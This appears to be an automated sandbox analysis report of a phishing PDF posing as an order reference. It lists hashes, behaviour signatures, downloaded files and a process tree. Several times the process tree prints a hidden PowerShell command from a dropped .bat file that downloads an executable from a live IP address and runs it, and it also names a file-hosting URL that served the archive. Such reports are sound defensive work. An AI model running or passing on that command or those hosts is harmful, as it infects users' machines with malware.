Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
-
submitted
02-10-2024 14:16
General
-
Target
Refrence-Order#63729.pdf
-
Size
75KB
-
MD5
a0c8986f254942da6398f191ea2de509
-
SHA1
4e40a90768dfeff4c0cb4411a176bd7be68c9ac7
-
SHA256
cf5b009d36a4f45d435e3a10ac62c19fcbd161f69689589f8e9280735441da5c
-
SHA512
0eef50fd30c31b3c21abd04715c59126625bb9805ef377a75b0f0ef6abe0336d7e1273591455fe33bd13bc49577aa37257a7d0e664083365c2fac7d4d00565a1
-
SSDEEP
1536:ThWq0RfD6oBNp2XEgbyv2VCQ6zYkwvrAi2DSYbTBxQ7MOxjd/VcReDjslRvwG:VZ0RfmUNp2XEgbS2VezYkwvMxt8jxNVM
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 58 IoCs
-
Modifies registry class 2 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 11 IoCs
-
Suspicious use of FindShellTrayWindow 17 IoCs
-
Suspicious use of SendNotifyMessage 8 IoCs
-
Suspicious use of SetWindowsHookEx 14 IoCs
-
Suspicious use of WriteProcessMemory 40 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Refrence-Order#63729.pdf"1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://files.catbox.moe/ft6o99.rar2⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2944 CREDAT:275457 /prefetch:23⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6XUZ2JLF\ft6o99.rar3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6XUZ2JLF\ft6o99.rar4⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6XUZ2JLF\ft6o99.rar"5⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
-
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://files.catbox.moe/ft6o99.rar2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1856 CREDAT:275457 /prefetch:23⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\ft6o99\" -spe -an -ai#7zMap9114:74:7zEvent164771⤵
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\ft6o99.rar"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7zOC0617FA7\Order-63729_Reference.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -w hidden iwr -Uri http://217.160.121.141:8030/5643254657/Order-63729r.exe -OutFile $env:TEMP\Order-63729_Reference.exe;Start-Process $env:TEMP\Order-63729_Reference.exe3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7zOC0688FB7\Order-63729_Reference.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -w hidden iwr -Uri http://217.160.121.141:8030/5643254657/Order-63729r.exe -OutFile $env:TEMP\Order-63729_Reference.exe;Start-Process $env:TEMP\Order-63729_Reference.exe3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\ft6o99\" -spe -an -ai#7zMap17142:74:7zEvent230761⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\ft6o99\Order-63729_Reference.bat1⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\ft6o99\Order-63729_Reference.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -w hidden iwr -Uri http://217.160.121.141:8030/5643254657/Order-63729r.exe -OutFile $env:TEMP\Order-63729_Reference.exe;Start-Process $env:TEMP\Order-63729_Reference.exe2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
Filesize
914B
MD5e4a68ac854ac5242460afd72481b2a44
SHA1df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA5125622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
Filesize
192B
MD5f2f607335698f35f2b53855ad908a344
SHA1a085e56d283b7330734f7ed65a7c706bd2da2887
SHA2564b7d872154efff9e5922dd60268d78a461976e321f1d410c39c09127637bb8b4
SHA51275bd6104942b63823c74ac6b2c42ce65e7ec86570ec822b0b842d9d24b972922d948dfb2fac1329e7c97845c4608119de807b17cd6c51948bfa20102b129d85d
-
Filesize
252B
MD5ba9653fb35745eb11290309ec7b25976
SHA13e772c522ebd65aa307daa4f4791cd97960eda91
SHA2566324391d8399fa977924cf07508f830a80e1e06d6c5fdac0156f8dbe98a25433
SHA5129a9e63405934a134b717d8316fb8a6eae685eacf4702d86e4111b43cf4e8e6098042548f082c9333a4787bbf36eccb3fd0dfee8a87ca09f32b5e6b74db2ea323
-
Filesize
342B
MD5dff038e36ab413daab53a85ce1804553
SHA12206b66dfc46c7ceb363f783f4be87f5d3d246fb
SHA256f817b3214086814f4f4a1a456e58c706466732fbcace719edbed16d072b935f3
SHA51229546e51b9f24acc5a5f8880dd0166a9b1b87298c3f7822ead5f0a4a1454c97a689f2e47fae3e8ff88b86573ad289be581a1393d7024bf7ab9777472f2810aaa
-
Filesize
342B
MD552ab5b525cf928c291549cc8712ccae7
SHA11c0594bc83d7503b4eb12b4e3beb43a60fce8459
SHA25638cc8e45116b58cc9671f2075b4466473dfd1d0c0e050b1ffbe9adcb5cf10870
SHA512a7e0cf43bd65d35380b40e8c363194cc0fd17a5fd010846aeb389c687ad8d81294c789dd2a25793cba31be718df8c388515e0cade7110f8ba3d28485def5c0d4
-
Filesize
342B
MD50739da90c72d87402fbb266e3cc4691d
SHA198ab658be4e52432ca85b5b3e9ed59a411c5b4a9
SHA256c7184c007cd0e0bb97a27bf3ebe86ae3bc2c21cae2e31cccdd9daaaa968044ae
SHA51279c4e33ade5fd0f682e9012cb2181e4d4e1ecadb10b4de8083cda7f59393edd4a8bb33b8a155a124d4bdd43e917de44c0232e9b3650a52c6ce185b3546cfa7d9
-
Filesize
342B
MD5c5137c1ac26cac5ba2a999ee229858d3
SHA14115cff79fcf087b88561a07b57ca1bef086c6b3
SHA256be8375022da4d7e0a3111ac9454c264a4882423e975ebcfc82a5444dbe58b3d7
SHA512cbf27c80daf698db2a3fcece002ecb7cf6c4dc888c17e4c7ebcf4cefa832f8ab5ddf04c466639a646f0ea0d3ab6c8e71bee5d7376568ec549176de52bb23dcd2
-
Filesize
342B
MD50890c426d70a37b78bd1f0ce10a759d0
SHA1a9105bc835b36421fad21312ce983ab74bf0d957
SHA25626875f9763c6bc05e9819ae475ade35faf1706db73727d52315f7f7abd3f70cb
SHA51232fa686ff1d994215d7978cbb64240a751a84ab5b188cfef419c501a89b2d50958a5d365b105ceab3c5fe04da9aa4367422e1149cb50458962377b921748daaf
-
Filesize
342B
MD53b9165d9e05562dcd01c0dba380f869b
SHA12092801d0f103dcb90868bb4c41b4f852e6679d3
SHA256e69017b1c6b55e0454ad36358501fc5ffe8cf0756a578d9c63f974943144ae2e
SHA512759f751414a31ad0ee65479181419d015927081d2a3b9a41e35a507ed32c3a6daea78d62d1c40982b0639642e828b7ff6c9bb2d76a6e35a9046a2134422fcc3b
-
Filesize
342B
MD5dd5629afe14e5a9d3baaa7b30ad96df8
SHA19d4327eb95c98be6dcbd633d9006500d1da60308
SHA2563742a262644ac201dc6ea7f332ae6fcdbbd2f91281ec5d395c4dfe40f8c01e14
SHA5127a8ae01fc8bee20728081ba22b72efc85060f759403b1aa5c6ef896fdf10526e11b4d12487de1c4b9242b65fbb2ab979149466a134604c769af7a1c723eb8a66
-
Filesize
342B
MD5a33265a832063efef9528d4a7f9b4f47
SHA1d814d9975a010052238eccbb9242c272d3a68af7
SHA256a18fab86184f0649e4f27b673b8b66593c24f7e9c9f80150e80a54f30918e667
SHA5124c883749cb99b2c96ec227bdeb8cd1638cb8b6e7b5907300ab6cb196f9ec56b32814cc8ae3360dc4dc4f5c64356ab5b092f77aedde940d90a65f9acaf9c4bef9
-
Filesize
342B
MD59295e63bd1dae5cca18573891ed979c8
SHA15474bad518f60e14a32e145b21ef09018f229699
SHA256b3978e9cc1e43f6af39e71c36d761282c3de9ebd5f1ef26b15cce98ad043ca3b
SHA512582d9e420298b9506620c9e8075265d119c912f633624ae08ce43af28cf7f9f648ff49063b7e7e3b992cc39a4728155c1ba56d06f70080595cc616874d0a988c
-
Filesize
342B
MD52b1db234bc9238184dbc4c85bc7024cc
SHA172462f73dadb8216fa3deb11611bfff7e0d228a2
SHA256942bd35c5839ab48388fb3795b49b75b757dcf6d6037cacbd107fffbc1df9651
SHA512fe0a4d1a5e32bd07c26daf0ade551ed7c31a50e6e0943fa075206260844e04891d989edc78dba9d10427158d8fb72fd48c262fbf4ee571e1374cd473e24a80d9
-
Filesize
342B
MD55cd0b2f59cb42a11e8db1efa0ab7add4
SHA190c6e070937c00455b9aaf8374073c4494309fcf
SHA25672ad15f7ee244893cc1b4d48583bd18043cf0bc57c806a0993dab783a9bbc0cd
SHA5122889f9db36ffee1364da948ec6b578df56f5dac2b52a1a33648ad282895a1bfe2e2cf60544e3b1ee610d51d8c66280fbb218ad706f4160f685f0e151a84f1cc4
-
Filesize
242B
MD52fab26612b792dee7124d4e4fc0aa7c9
SHA1d34ea0a299df110a388ffb1cc3876863de92f8fa
SHA256c32a34c51a996afcc6b04aa32fb4b926d813e3d2728977e41a171c487a8c1ea4
SHA512b53c421b9f1b164b0ebfa556f29843d1d2612f640ebf786f29ae7a2af916a2532aac889427981cc4c4494794f702941f4662b029554251032e73d587202a91bb
-
Filesize
257B
MD5c5b640f6226386f6a684264914e3ef2b
SHA10baaa36774d2b11e37aff59847f2614835d18862
SHA2562313634b41b6a6616525373b3eefb4d4f4453374ea407372cf9fd39a786b70f3
SHA512dbd86416e491f068484bf95c872fba9c40d52bf4709c4bcfd2426d7aac6fdc9f5dee43ac1536243970204d21be668fc900a7e131c83c3c43bb76472fb20a681b
-
Filesize
208B
MD51959937c119d4b66dd48d8067850f50d
SHA183c9104b1aa305fe13d1321cda6a2cabbb9241fc
SHA256e512ec36ea716c5a62c1a24fb8b794c4e6a0db4c5c7ed1d16025400428622cc2
SHA512a9b2230f6b2e0a59a2b8b8697e7beb6379a65cc0831108d6e342970e8a1fb6e4e307080053035e26f28fa62d2b1c8ccbc7927c2cf2c7e6523238d0dcf9f6b956
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
3KB
MD5b5ebe652b60c0da8d0e09430c9f85ef1
SHA1aeb80277df08ee0a22bf4030f6850129fb40b336
SHA256c127a3240bc21e930a5cb4e9e556a286d35ae6975506c85a6cf43fea737af629
SHA512bfde589d39fa32775d52a1923950d0bb78be212cc27d2ff5e5cf3e20beb2994a684f43dc9a8cb2bb5f2855c489ac9d9372b8afb9025b9959aa0b4659ccc8fa82
-
Filesize
7KB
MD5dcdbdb4f65a6d21660d812ae7b7bfc04
SHA148da07715b18f0dc6df2fcf265a499dac6933e28
SHA256055876bc5c3d9c22ae487c929ec110195eaf02d805029b9bee48f96b333dbc56
SHA512597404646dc10e216973e83aa7e1b00c435b56e1aaffdfa25b6f514c3aa6fddc5d981f1b8e520a6d1185adbbd979f7882b25b7deaeffb1ca6549e3d7a3ef10c3
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
16.7MB
-
Filesize
2.7MB
-
Filesize
992KB
-
Filesize
208KB